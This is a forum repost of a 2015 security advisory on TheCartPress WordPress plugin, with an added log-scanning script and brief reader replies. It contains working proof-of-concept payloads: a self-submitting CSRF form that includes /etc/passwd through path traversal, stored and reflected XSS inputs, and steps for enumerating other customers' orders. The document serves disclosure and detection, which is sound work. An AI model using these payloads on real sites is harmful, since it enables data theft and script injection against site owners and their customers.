WordPress TheCartPress Plugin 1.3.9 Multiple Vulnerabilities

    Posted on 2015-5-1 14:22:56
    CVE: 2015-3301
    Product: TheCartPress WordPress plugin
    Vendor: TheCartPress team
    Vulnerable Version(s): 1.3.9 and probably prior
    Tested Version: 1.3.9
    Advisory Publication:  April 8, 2015  [without technical details]
    Vendor Notification: April 8, 2015 
    Public Disclosure: April 29, 2015 
    Vulnerability Type: Cross-Site Scripting [CWE-79], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79], Improper Access Control [CWE-284]
    CVE References: CVE-2015-3301, CVE-2015-3300, CVE-2015-3302
    Risk Level: High 
    CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
    Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
      
    -----------------------------------------------------------------------------------------------
      
    Advisory Details:
      
    High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in TheCartPress WordPress plugin, which can be exploited to execute arbitrary PHP code, disclose sensitive data, and perform Cross-Site Scripting attacks against users of WordPress installations with the vulnerable plugin.
      
    1) Local PHP File Inclusion in TheCartPress WordPress plugin: CVE-2015-3301
      
    Input passed via the "tcp_box_path" HTTP POST parameter passed to "/wp-admin/admin.php?page=checkout_editor_settings" URL is not properly verified before being used in PHP 'include()' function, and can be abused to include arbitrary local files via directory traversal sequences.
      
    In order to successfully exploit the vulnerability an attacker needs to have administrator privileges on WordPress installation, however this can be also exploited via CSRF vector to which the script is vulnerable as well. 
      
    The simple CSRF exploit below will execute the content of the '/etc/passwd' file when a logged-in administrator visits a page with it:
      
    <form action="http://wordpress/wp-admin/admin.php?page=checkout_editor_settings" method="post" name="main">
    <input type="hidden" name="tcp_save_fields"  value='1'>
    <input type="hidden" name="tcp_box_path"  value='../../../../../etc/passwd'>
    <input type="submit" id="btn">
    </form>
    <script>
     document.main.submit();
    </script>
      
      
      
    2) Stored XSS in TheCartPress WordPress plugin: CVE-2015-3300
      
    During the checkout process, many user-supplied HTTP POST parameters (see complete list in PoC) in "Shipping address" and "Billing address" sections are not being sanitized before being stored in the local database.
      
    Simple mass-XSS PoC against "Billing address" section (PoC against "Shipping address" section is identical, just replace 'billing_' prefix with 'shipping_') will write several JS pop-up alerts into the application database:
      
    <form action="http://wordpress/shopping-cart/checkout/" method="post" name="main">
    <input type="hidden" name="selected_billing_id"  value='1'>
    <input type="hidden" name="selected_billing_address"  value='new'>
    <input type="hidden" name="billing_firstname"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_lastname"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_company"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_tax_id_number"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_country_id"  value='AF'>
    <input type="hidden" name="billing_region_id"  value=''>
    <input type="hidden" name="billing_region"  value=''>
    <input type="hidden" name="billing_city"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_street"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_street_2"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_postcode"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_telephone_1"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_telephone_2"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_fax"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_email"  value='mail@mail.com'>
    <input type="hidden" name="tcp_continue"  value=''>
    <input type="hidden" name="tcp_step"  value='1'>
    <input type="submit" id="btn">
    </form>
      
      
    A non-authenticated attacker may inject malicious HTML and JS code that will be stored in the application database, and available to any non-authenticated user on the following URL:
      
    http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order
      
    As well as on the following URL accessible to WordPress administrator only:
      
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/OrdersListTable.php
      
      
    3) Improper Access Control in TheCartPress WordPress plugin: CVE-2015-3302
      
    Any non-authenticated user may browse orders of other users due to broken authentication mechanism. To reproduce the vulnerability an attacker shall first open the following URL:
    http://wordpress/shopping-cart/checkout/?tcp_checkout=ok&order_id=[order_id]
      
    And just after open the following URL to see full order details:
    http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order
      
    Moreover, the order ID can be easily predicted, as every new order ID is an incremented value of the previous one. This enables non-authenticated remote attacker to steal all currently-existing orders.
      
      
    4) Multiple XSS in TheCartPress WordPress plugin (against administrator only): CVE-2015-3300
      
    4.1 Input passed via the "search_by" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
      
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php&search_by=--%3E%%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
      
    4.2 Input passed via the "address_id", "address_name", "firstname", "lastname", "street", "city", "postcode", "email" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
      
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_name=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&firstname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&lastname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&street=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&city=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&postcode=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&email=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
      
    4.3 Input passed via the "post_id" and "rel_type" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
      
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=1&rel_type=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
      
    4.4 Input passed via the "post_type" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
      
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php&post_type=1--%3E%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
      
    -----------------------------------------------------------------------------------------------
      
    Solution:
      
    2015-04-08 Vendor Alerted via emails.
    2015-04-17 Vendor Alerted via contact form and emails.
    2015-04-17 Vendor Alerted via WordPress Support Forums.
    2015-04-27 Fix Requested via emails.
    2015-04-29 Public disclosure.
      
    Currently we are not aware of any official solution for this vulnerability.
    According to the vendor the plugin will not be supported anymore since 1st of June 2015: http://thecartpress.com/extend/important-note-nota-importante/
      
    We recommend disabling or removing the vulnerable plugin as a workaround.
     
    [2015-05-01]  #
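
With no vendor fix available, a site that ran the plugin can check its web server access logs for the three request patterns the advisory describes. The following is an added example, not part of the original post or the advisory; the combined log format, the alert threshold, the site host name and the sample lines are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Combined log format: ip - user [time] "METHOD target PROTO" status size "referer" ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" \d{3} \S+ "([^"]*)"')
SITE_HOST = "wordpress"   # placeholder host name used in the advisory's URLs
ENUM_THRESHOLD = 3        # assumption: distinct order IDs per client before alerting
MARKUP = re.compile(r'[<>"]')

def scan(lines):
    """Return a sorted list of (client_ip, finding) tuples."""
    findings, orders = set(), defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, method, target, referer = m.groups()
        try:
            url, ref_host = urlsplit(target), urlsplit(referer).hostname
        except ValueError:  # malformed URL in a client-controlled field
            continue
        q = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        page = q.get("page", [""])[0]
        # CVE-2015-3302: collect the order IDs each client asks to print
        if url.path.endswith("/admin-ajax.php") and "tcp_print_order" in q.get("action", []):
            orders[ip].update(q.get("order_id", []))
        # CVE-2015-3300 (section 4): markup in GET parameters of the plugin's admin pages
        if page.startswith("thecartpress/admin/"):
            for name, values in q.items():
                if name != "page" and any(MARKUP.search(v) for v in values):
                    findings.add((ip, "xss-markup:" + name))
        # CVE-2015-3301 CSRF vector: settings POST with a missing or foreign Referer
        if method == "POST" and page == "checkout_editor_settings" and ref_host != SITE_HOST:
            findings.add((ip, "cross-site-post:checkout_editor_settings"))
    for ip, ids in orders.items():
        if len(ids) >= ENUM_THRESHOLD:
            findings.add((ip, "order-enumeration:%d" % len(ids)))
    return sorted(findings)
# Constructed sample log lines (documentation IP ranges), not taken from a real server.
T = '[30/Apr/2015:10:00:00 +0000]'
SAMPLE = [
    f'203.0.113.7 - - {T} "GET /wp-admin/admin-ajax.php?order_id={n}&action=tcp_print_order HTTP/1.1" 200 512 "-" "-"'
    for n in (41, 42, 43)
] + [
    f'198.51.100.9 - - {T} "GET /wp-admin/admin.php?page=thecartpress/admin/AddressesList.php&search_by=%22%3E%3Cscript%3E HTTP/1.1" 200 900 "-" "-"',
    f'198.51.100.9 - - {T} "POST /wp-admin/admin.php?page=checkout_editor_settings HTTP/1.1" 200 700 "http://other.example/lure.html" "-"',
    f'192.0.2.10 - - {T} "POST /wp-admin/admin.php?page=checkout_editor_settings HTTP/1.1" 200 700 "http://wordpress/wp-admin/admin.php?page=checkout_editor_settings" "-"',
]
```

The stored XSS from section 2 and the "tcp_box_path" value itself travel in POST bodies, so they do not appear in access logs; finding them requires inspecting the order records in the database or request-body logging.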

    Posted on 2015-6-26 20:43:45
    Here to learn the techniques, keep it up!

    Posted on 2015-6-27 10:05:20
    Thanks to the OP for sharing~

    Posted on 2015-6-27 13:57:04
    Here to learn the techniques, keep it up!

    Posted on 2015-6-28 01:06:30
    Support, this looks good!

    Posted on 2015-6-28 05:10:03
    Support, this looks good!

    Posted on 2015-6-28 11:39:17
    Here to learn the techniques, keep it up!
